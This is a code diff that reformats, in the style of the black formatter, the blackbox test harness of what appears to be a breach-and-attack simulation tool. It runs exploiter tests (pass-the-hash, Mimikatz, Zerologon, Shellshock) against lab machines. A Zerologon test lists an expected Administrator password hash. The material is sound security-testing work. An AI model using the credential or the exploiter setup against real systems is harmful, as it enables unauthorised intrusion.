+        return "{}.txt".format(monkey["ip_addresses"][0])
 
     def get_log_path_for_monkey(self, monkey):
         return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))
@@ -5,13 +5,12 @@ LOGGER = logging.getLogger(__name__)
 
 
 class MonkeyLogParser(object):
-
     def __init__(self, log_path):
         self.log_path = log_path
         self.log_contents = self.read_log()
 
     def read_log(self):
-        with open(self.log_path, 'r') as log:
+        with open(self.log_path, "r") as log:
             return log.read()
 
     def print_errors(self):
@@ -6,7 +6,6 @@ LOGGER = logging.getLogger(__name__)
 
 
 class MonkeyLogsDownloader(object):
-
     def __init__(self, island_client, log_dir_path):
         self.island_client = island_client
         self.log_dir_path = log_dir_path
@@ -5,7 +5,7 @@ import shutil
 from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
 from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
 
-LOG_DIR_NAME = 'logs'
+LOG_DIR_NAME = "logs"
 LOGGER = logging.getLogger(__name__)
 
 
@@ -18,8 +18,10 @@ class TestLogsHandler(object):
     def parse_test_logs(self):
         log_paths = self.download_logs()
         if not log_paths:
-            LOGGER.error("No logs were downloaded. Maybe no monkeys were ran "
-                         "or early exception prevented log download?")
+            LOGGER.error(
+                "No logs were downloaded. Maybe no monkeys were ran "
+                "or early exception prevented log download?"
+            )
             return
         TestLogsHandler.parse_logs(log_paths)
 
@@ -5,13 +5,10 @@ from time import sleep
 import pytest
 from typing_extensions import Type
 
-from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import \
-    CommunicationAnalyzer
+from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
 from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
-from envs.monkey_zoo.blackbox.island_client.island_config_parser import \
-    IslandConfigParser
-from envs.monkey_zoo.blackbox.island_client.monkey_island_client import \
-    MonkeyIslandClient
+from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
+from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
 from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
 from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
 from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
@ -28,33 +25,51 @@ from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth
|
from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth
|
||||||
from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon
|
from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon
|
||||||
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import \
|
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
|
||||||
TestLogsHandler
|
|
||||||
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.map_generation import \
|
from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest
|
||||||
MapGenerationTest
|
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import (
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import \
|
MapGenerationFromTelemetryTest,
|
||||||
MapGenerationFromTelemetryTest
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.report_generation import \
|
from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest
|
||||||
ReportGenerationTest
|
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import (
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \
|
ReportGenerationFromTelemetryTest,
|
||||||
ReportGenerationFromTelemetryTest
|
)
|
||||||
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import \
|
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
|
||||||
TelemetryPerformanceTest
|
TelemetryPerformanceTest,
|
||||||
|
)
|
||||||
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
|
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
|
||||||
|
|
||||||
DEFAULT_TIMEOUT_SECONDS = 5*60
|
DEFAULT_TIMEOUT_SECONDS = 5 * 60
|
||||||
MACHINE_BOOTUP_WAIT_SECONDS = 30
|
MACHINE_BOOTUP_WAIT_SECONDS = 30
|
||||||
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
|
GCP_TEST_MACHINE_LIST = [
|
||||||
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
|
"sshkeys-11",
|
||||||
'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8', 'zerologon-25',
|
"sshkeys-12",
|
||||||
'drupal-28']
|
"elastic-4",
|
||||||
|
"elastic-5",
|
||||||
|
"hadoop-2",
|
||||||
|
"hadoop-3",
|
||||||
|
"mssql-16",
|
||||||
|
"mimikatz-14",
|
||||||
|
"mimikatz-15",
|
||||||
|
"struts2-23",
|
||||||
|
"struts2-24",
|
||||||
|
"tunneling-9",
|
||||||
|
"tunneling-10",
|
||||||
|
"tunneling-11",
|
||||||
|
"tunneling-12",
|
||||||
|
"weblogic-18",
|
||||||
|
"weblogic-19",
|
||||||
|
"shellshock-8",
|
||||||
|
"zerologon-25",
|
||||||
|
"drupal-28",
|
||||||
|
]
|
||||||
LOG_DIR_PATH = "./logs"
|
LOG_DIR_PATH = "./logs"
|
||||||
logging.basicConfig(level=logging.INFO)
|
logging.basicConfig(level=logging.INFO)
|
||||||
LOGGER = logging.getLogger(__name__)
|
LOGGER = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture(autouse=True, scope='session')
|
@pytest.fixture(autouse=True, scope="session")
|
||||||
def GCPHandler(request, no_gcp):
|
def GCPHandler(request, no_gcp):
|
||||||
if not no_gcp:
|
if not no_gcp:
|
||||||
GCPHandler = gcp_machine_handlers.GCPHandler()
|
GCPHandler = gcp_machine_handlers.GCPHandler()
|
||||||
|
@@ -67,7 +82,7 @@ def GCPHandler(request, no_gcp):
     request.addfinalizer(fin)
 
 
-@pytest.fixture(autouse=True, scope='session')
+@pytest.fixture(autouse=True, scope="session")
 def delete_logs():
     LOGGER.info("Deleting monkey logs before new tests.")
     TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
@@ -77,7 +92,7 @@ def wait_machine_bootup():
     sleep(MACHINE_BOOTUP_WAIT_SECONDS)
 
 
-@pytest.fixture(scope='class')
+@pytest.fixture(scope="class")
 def island_client(island, quick_performance_tests):
     island_client_object = MonkeyIslandClient(island)
     if not quick_performance_tests:
@@ -85,41 +100,55 @@ def island_client(island, quick_performance_tests):
     yield island_client_object
 
 
-@pytest.mark.usefixtures('island_client')
+@pytest.mark.usefixtures("island_client")
 # noinspection PyUnresolvedReferences
 class TestMonkeyBlackbox:
-
     @staticmethod
-    def run_exploitation_test(island_client: MonkeyIslandClient,
-                              config_template: Type[ConfigTemplate],
-                              test_name: str,
-                              timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
+    def run_exploitation_test(
+        island_client: MonkeyIslandClient,
+        config_template: Type[ConfigTemplate],
+        test_name: str,
+        timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS,
+    ):
         raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
-        analyzer = CommunicationAnalyzer(island_client,
-                                         IslandConfigParser.get_ips_of_targets(raw_config))
-        log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
+        analyzer = CommunicationAnalyzer(
+            island_client, IslandConfigParser.get_ips_of_targets(raw_config)
+        )
+        log_handler = TestLogsHandler(
+            test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()
+        )
         ExploitationTest(
             name=test_name,
             island_client=island_client,
             raw_config=raw_config,
             analyzers=[analyzer],
             timeout=timeout_in_seconds,
-            log_handler=log_handler).run()
+            log_handler=log_handler,
+        ).run()
 
     @staticmethod
-    def run_performance_test(performance_test_class, island_client,
-                             config_template, timeout_in_seconds, break_on_timeout=False):
+    def run_performance_test(
+        performance_test_class,
+        island_client,
+        config_template,
+        timeout_in_seconds,
+        break_on_timeout=False,
+    ):
         raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
-        log_handler = TestLogsHandler(performance_test_class.TEST_NAME,
-                                      island_client,
-                                      TestMonkeyBlackbox.get_log_dir_path())
-        analyzers = [CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))]
-        performance_test_class(island_client=island_client,
-                               raw_config=raw_config,
-                               analyzers=analyzers,
-                               timeout=timeout_in_seconds,
-                               log_handler=log_handler,
-                               break_on_timeout=break_on_timeout).run()
+        log_handler = TestLogsHandler(
+            performance_test_class.TEST_NAME, island_client, TestMonkeyBlackbox.get_log_dir_path()
+        )
+        analyzers = [
+            CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))
+        ]
+        performance_test_class(
+            island_client=island_client,
+            raw_config=raw_config,
+            analyzers=analyzers,
+            timeout=timeout_in_seconds,
+            log_handler=log_handler,
+            break_on_timeout=break_on_timeout,
+        ).run()
 
     @staticmethod
     def get_log_dir_path():
@@ -138,7 +167,9 @@ class TestMonkeyBlackbox:
         TestMonkeyBlackbox.run_exploitation_test(island_client, Mssql, "MSSQL_exploiter")
 
     def test_smb_and_mimikatz_exploiters(self, island_client):
-        TestMonkeyBlackbox.run_exploitation_test(island_client, SmbMimikatz, "SMB_exploiter_mimikatz")
+        TestMonkeyBlackbox.run_exploitation_test(
+            island_client, SmbMimikatz, "SMB_exploiter_mimikatz"
+        )
 
     def test_smb_pth(self, island_client):
         TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH")
@@ -159,31 +190,42 @@ class TestMonkeyBlackbox:
         TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellschock_exploiter")
 
     def test_tunneling(self, island_client):
-        TestMonkeyBlackbox.run_exploitation_test(island_client, Tunneling, "Tunneling_exploiter", 15 * 60)
+        TestMonkeyBlackbox.run_exploitation_test(
+            island_client, Tunneling, "Tunneling_exploiter", 15 * 60
+        )
 
     def test_wmi_and_mimikatz_exploiters(self, island_client):
-        TestMonkeyBlackbox.run_exploitation_test(island_client, WmiMimikatz, "WMI_exploiter,_mimikatz")
+        TestMonkeyBlackbox.run_exploitation_test(
+            island_client, WmiMimikatz, "WMI_exploiter,_mimikatz"
+        )
 
     def test_wmi_pth(self, island_client):
         TestMonkeyBlackbox.run_exploitation_test(island_client, WmiPth, "WMI_PTH")
 
     def test_zerologon_exploiter(self, island_client):
         test_name = "Zerologon_exploiter"
-        expected_creds = ["Administrator",
-                          "aad3b435b51404eeaad3b435b51404ee",
-                          "2864b62ea4496934a5d6e86f50b834a5"]
+        expected_creds = [
+            "Administrator",
+            "aad3b435b51404eeaad3b435b51404ee",
+            "2864b62ea4496934a5d6e86f50b834a5",
+        ]
         raw_config = IslandConfigParser.get_raw_config(Zerologon, island_client)
         analyzer = ZerologonAnalyzer(island_client, expected_creds)
-        log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
+        log_handler = TestLogsHandler(
+            test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()
+        )
         ExploitationTest(
             name=test_name,
             island_client=island_client,
             raw_config=raw_config,
             analyzers=[analyzer],
             timeout=DEFAULT_TIMEOUT_SECONDS,
-            log_handler=log_handler).run()
+            log_handler=log_handler,
+        ).run()
 
-    @pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.")
+    @pytest.mark.skip(
+        reason="Perfomance test that creates env from fake telemetries is faster, use that instead."
+    )
     def test_report_generation_performance(self, island_client, quick_performance_tests):
         """
         This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
@@ -193,21 +235,21 @@ class TestMonkeyBlackbox:
         and the Timing one which checks how long the report took to execute
         """
         if not quick_performance_tests:
-            TestMonkeyBlackbox.run_performance_test(ReportGenerationTest,
-                                                    island_client,
-                                                    Performance,
-                                                    timeout_in_seconds=10*60)
+            TestMonkeyBlackbox.run_performance_test(
+                ReportGenerationTest, island_client, Performance, timeout_in_seconds=10 * 60
+            )
         else:
             LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
             assert False
 
-    @pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.")
+    @pytest.mark.skip(
+        reason="Perfomance test that creates env from fake telemetries is faster, use that instead."
+    )
     def test_map_generation_performance(self, island_client, quick_performance_tests):
         if not quick_performance_tests:
-            TestMonkeyBlackbox.run_performance_test(MapGenerationTest,
-                                                    island_client,
-                                                    "PERFORMANCE.conf",
-                                                    timeout_in_seconds=10*60)
+            TestMonkeyBlackbox.run_performance_test(
+                MapGenerationTest, island_client, "PERFORMANCE.conf", timeout_in_seconds=10 * 60
+            )
         else:
             LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
             assert False
@ -219,4 +261,6 @@ class TestMonkeyBlackbox:
|
||||||
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
|
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
|
||||||
|
|
||||||
def test_telem_performance(self, island_client, quick_performance_tests):
|
def test_telem_performance(self, island_client, quick_performance_tests):
|
||||||
TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance()
|
TelemetryPerformanceTest(
|
||||||
|
island_client, quick_performance_tests
|
||||||
|
).test_telemetry_performance()
|
||||||
|
|
|
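
Note on the wrapping pattern above (and throughout this commit): black first tries to fit a call on one line; if that fails it indents the arguments as a single group, and if even that is too long it puts one argument per line and appends a trailing comma. The configured line length appears to be around 100 characters, which is an assumption inferred from the lines black left untouched (black's default is 88). A minimal before/after sketch using the call above:

    # Before: arguments hand-aligned under the opening parenthesis.
    TestMonkeyBlackbox.run_performance_test(ReportGenerationTest,
                                            island_client,
                                            Performance,
                                            timeout_in_seconds=10 * 60)

    # After: black packs the arguments onto one indented line when they fit...
    TestMonkeyBlackbox.run_performance_test(
        ReportGenerationTest, island_client, Performance, timeout_in_seconds=10 * 60
    )

    # ...and otherwise explodes them one per line with a trailing comma,
    # as in the ExploitationTest(...) call in test_zerologon_exploiter above.
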
@@ -2,7 +2,6 @@ import abc


 class BasicTest(abc.ABC):
-
     @abc.abstractmethod
     def run(self):
         pass
@@ -13,7 +13,6 @@ LOGGER = logging.getLogger(__name__)


 class ExploitationTest(BasicTest):
-
     def __init__(self, name, island_client, raw_config, analyzers, timeout, log_handler):
         self.name = name
         self.island_client = island_client
@@ -48,18 +47,25 @@ class ExploitationTest(BasicTest):
                 self.log_success(timer)
                 return
             sleep(DELAY_BETWEEN_ANALYSIS)
-            LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
+            LOGGER.debug(
+                "Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken())
+            )
         self.log_failure(timer)
         assert False

     def log_success(self, timer):
         LOGGER.info(self.get_analyzer_logs())
-        LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
+        LOGGER.info(
+            "{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken())
+        )

     def log_failure(self, timer):
         LOGGER.info(self.get_analyzer_logs())
-        LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
-                                                                                             timer.get_time_taken()))
+        LOGGER.error(
+            "{} test failed because of timeout. Time taken: {:.1f} seconds.".format(
+                self.name, timer.get_time_taken()
+            )
+        )

     def all_analyzers_pass(self):
         analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
@@ -73,7 +79,10 @@ class ExploitationTest(BasicTest):

     def wait_until_monkeys_die(self):
         time_passed = 0
-        while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
+        while (
+            not self.island_client.is_all_monkeys_dead()
+            and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE
+        ):
             sleep(WAIT_TIME_BETWEEN_REQUESTS)
             time_passed += WAIT_TIME_BETWEEN_REQUESTS
             LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
@@ -10,7 +10,6 @@ LOGGER = logging.getLogger(__name__)


 class EndpointPerformanceTest(BasicTest):
-
     def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient):
         self.name = name
         self.test_config = test_config
@@ -21,8 +20,9 @@ class EndpointPerformanceTest(BasicTest):
         endpoint_timings = {}
         for endpoint in self.test_config.endpoints_to_test:
             self.island_client.clear_caches()
-            endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint,
-                                                                                      SupportedRequestMethod.GET)
+            endpoint_timings[endpoint] = self.island_client.requests.get_request_time(
+                endpoint, SupportedRequestMethod.GET
+            )
         analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings)

         return analyzer.analyze_test_results()
@@ -3,7 +3,9 @@ from datetime import timedelta
 from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
 from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
-from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
+from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import (
+    PerformanceTestWorkflow,
+)

 MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
 MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@@ -17,18 +19,22 @@ class MapGenerationTest(PerformanceTest):

     TEST_NAME = "Map generation performance test"

-    def __init__(self, island_client, raw_config, analyzers,
-                 timeout, log_handler, break_on_timeout):
+    def __init__(
+        self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
+    ):
         self.island_client = island_client
-        exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client,
-                                             raw_config, analyzers, timeout, log_handler)
-        performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
-                                                   max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
-                                                   endpoints_to_test=MAP_RESOURCES,
-                                                   break_on_timeout=break_on_timeout)
-        self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME,
-                                                                 exploitation_test,
-                                                                 performance_config)
+        exploitation_test = ExploitationTest(
+            MapGenerationTest.TEST_NAME, island_client, raw_config, analyzers, timeout, log_handler
+        )
+        performance_config = PerformanceTestConfig(
+            max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
+            max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
+            endpoints_to_test=MAP_RESOURCES,
+            break_on_timeout=break_on_timeout,
+        )
+        self.performance_test_workflow = PerformanceTestWorkflow(
+            MapGenerationTest.TEST_NAME, exploitation_test, performance_config
+        )

     def run(self):
         self.performance_test_workflow.run()
@@ -2,8 +2,9 @@ from datetime import timedelta

 from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
-from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
-    TelemetryPerformanceTestWorkflow
+from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import (
+    TelemetryPerformanceTestWorkflow,
+)

 MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
 MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@@ -19,14 +20,18 @@ class MapGenerationFromTelemetryTest(PerformanceTest):

     def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False):
         self.island_client = island_client
-        performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
-                                                   max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
-                                                   endpoints_to_test=MAP_RESOURCES,
-                                                   break_on_timeout=break_on_timeout)
-        self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME,
-                                                                          self.island_client,
-                                                                          performance_config,
-                                                                          quick_performance_test)
+        performance_config = PerformanceTestConfig(
+            max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
+            max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
+            endpoints_to_test=MAP_RESOURCES,
+            break_on_timeout=break_on_timeout,
+        )
+        self.performance_test_workflow = TelemetryPerformanceTestWorkflow(
+            MapGenerationFromTelemetryTest.TEST_NAME,
+            self.island_client,
+            performance_config,
+            quick_performance_test,
+        )

     def run(self):
         self.performance_test_workflow.run()
@@ -4,10 +4,10 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest


 class PerformanceTest(BasicTest, metaclass=ABCMeta):
-
     @abstractmethod
-    def __init__(self, island_client, raw_config, analyzers,
-                 timeout, log_handler, break_on_timeout):
+    def __init__(
+        self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
+    ):
         pass

     @property
@@ -3,9 +3,13 @@ from typing import List


 class PerformanceTestConfig:
-
-    def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta,
-                 endpoints_to_test: List[str] = None, break_on_timeout=False):
+    def __init__(
+        self,
+        max_allowed_single_page_time: timedelta,
+        max_allowed_total_time: timedelta,
+        endpoints_to_test: List[str] = None,
+        break_on_timeout=False,
+    ):
         self.max_allowed_single_page_time = max_allowed_single_page_time
         self.max_allowed_total_time = max_allowed_total_time
         self.endpoints_to_test = endpoints_to_test
@@ -1,12 +1,15 @@
 from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
 from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
-from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
+from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import (
+    EndpointPerformanceTest,
+)
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig


 class PerformanceTestWorkflow(BasicTest):
-
-    def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig):
+    def __init__(
+        self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig
+    ):
         self.name = name
         self.exploitation_test = exploitation_test
         self.island_client = exploitation_test.island_client
@@ -25,7 +28,9 @@ class PerformanceTestWorkflow(BasicTest):
             self.exploitation_test.wait_for_monkey_process_to_finish()
             if not self.island_client.is_all_monkeys_dead():
                 raise RuntimeError("Can't test report times since not all Monkeys have died.")
-            performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
+            performance_test = EndpointPerformanceTest(
+                self.name, self.performance_config, self.island_client
+            )
             try:
                 if not self.island_client.is_all_monkeys_dead():
                     raise RuntimeError("Can't test report times since not all Monkeys have died.")
@@ -3,7 +3,9 @@ from datetime import timedelta
 from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
 from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
-from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
+from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import (
+    PerformanceTestWorkflow,
+)

 MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
 MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@@ -13,25 +15,34 @@ REPORT_RESOURCES = [
     "api/attack/report",
     "api/report/zero_trust/findings",
     "api/report/zero_trust/principles",
-    "api/report/zero_trust/pillars"
+    "api/report/zero_trust/pillars",
 ]


 class ReportGenerationTest(PerformanceTest):
     TEST_NAME = "Report generation performance test"

-    def __init__(self, island_client, raw_config, analyzers,
-                 timeout, log_handler, break_on_timeout):
+    def __init__(
+        self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
+    ):
         self.island_client = island_client
-        exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client,
-                                             raw_config, analyzers, timeout, log_handler)
-        performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
-                                                   max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
-                                                   endpoints_to_test=REPORT_RESOURCES,
-                                                   break_on_timeout=break_on_timeout)
-        self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME,
-                                                                 exploitation_test,
-                                                                 performance_config)
+        exploitation_test = ExploitationTest(
+            ReportGenerationTest.TEST_NAME,
+            island_client,
+            raw_config,
+            analyzers,
+            timeout,
+            log_handler,
+        )
+        performance_config = PerformanceTestConfig(
+            max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
+            max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
+            endpoints_to_test=REPORT_RESOURCES,
+            break_on_timeout=break_on_timeout,
+        )
+        self.performance_test_workflow = PerformanceTestWorkflow(
+            ReportGenerationTest.TEST_NAME, exploitation_test, performance_config
+        )

     def run(self):
         self.performance_test_workflow.run()
@@ -2,8 +2,9 @@ from datetime import timedelta

 from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
-from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
-    TelemetryPerformanceTestWorkflow
+from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import (
+    TelemetryPerformanceTestWorkflow,
+)

 MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
 MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@@ -13,7 +14,7 @@ REPORT_RESOURCES = [
     "api/attack/report",
     "api/report/zero_trust/findings",
     "api/report/zero_trust/principles",
-    "api/report/zero_trust/pillars"
+    "api/report/zero_trust/pillars",
 ]

@@ -23,14 +24,18 @@ class ReportGenerationFromTelemetryTest(PerformanceTest):

     def __init__(self, island_client, quick_performance_test, break_on_timeout=False):
         self.island_client = island_client
-        performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
-                                                   max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
-                                                   endpoints_to_test=REPORT_RESOURCES,
-                                                   break_on_timeout=break_on_timeout)
-        self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME,
-                                                                          self.island_client,
-                                                                          performance_config,
-                                                                          quick_performance_test)
+        performance_config = PerformanceTestConfig(
+            max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
+            max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
+            endpoints_to_test=REPORT_RESOURCES,
+            break_on_timeout=break_on_timeout,
+        )
+        self.performance_test_workflow = TelemetryPerformanceTestWorkflow(
+            ReportGenerationFromTelemetryTest.TEST_NAME,
+            self.island_client,
+            performance_config,
+            quick_performance_test,
+        )

     def run(self):
         self.performance_test_workflow.run()
@@ -5,39 +5,43 @@ from typing import Dict, List

 from tqdm import tqdm

-TELEM_DIR_PATH = './tests/performance/telem_sample'
+TELEM_DIR_PATH = "./tests/performance/telem_sample"
 MAX_SAME_TYPE_TELEM_FILES = 10000
 LOGGER = logging.getLogger(__name__)


 class SampleFileParser:
-
     @staticmethod
     def save_teletries_to_files(telems: List[Dict]):
-        for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)):
+        for telem in tqdm(telems, desc="Telemetries saved to files", position=3):
             SampleFileParser.save_telemetry_to_file(telem)

     @staticmethod
     def save_telemetry_to_file(telem: Dict):
-        telem_filename = telem['name'] + telem['method']
+        telem_filename = telem["name"] + telem["method"]
         for i in range(MAX_SAME_TYPE_TELEM_FILES):
             if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))):
                 telem_filename = str(i) + telem_filename
                 break
-        with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file:
+        with open(path.join(TELEM_DIR_PATH, telem_filename), "w") as file:
             file.write(json.dumps(telem))

     @staticmethod
     def read_telem_files() -> List[str]:
         telems = []
         try:
-            file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH)
-                          if path.isfile(path.join(TELEM_DIR_PATH, f))]
+            file_paths = [
+                path.join(TELEM_DIR_PATH, f)
+                for f in listdir(TELEM_DIR_PATH)
+                if path.isfile(path.join(TELEM_DIR_PATH, f))
+            ]
         except FileNotFoundError:
-            raise FileNotFoundError("Telemetries to send not found. "
-                                    "Refer to readme to figure out how to generate telemetries and where to put them.")
+            raise FileNotFoundError(
+                "Telemetries to send not found. "
+                "Refer to readme to figure out how to generate telemetries and where to put them."
+            )
         for file_path in file_paths:
-            with open(file_path, 'r') as telem_file:
+            with open(file_path, "r") as telem_file:
                 telem_string = "".join(telem_file.readlines()).replace("\n", "")
                 telems.append(telem_string)
         return telems
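
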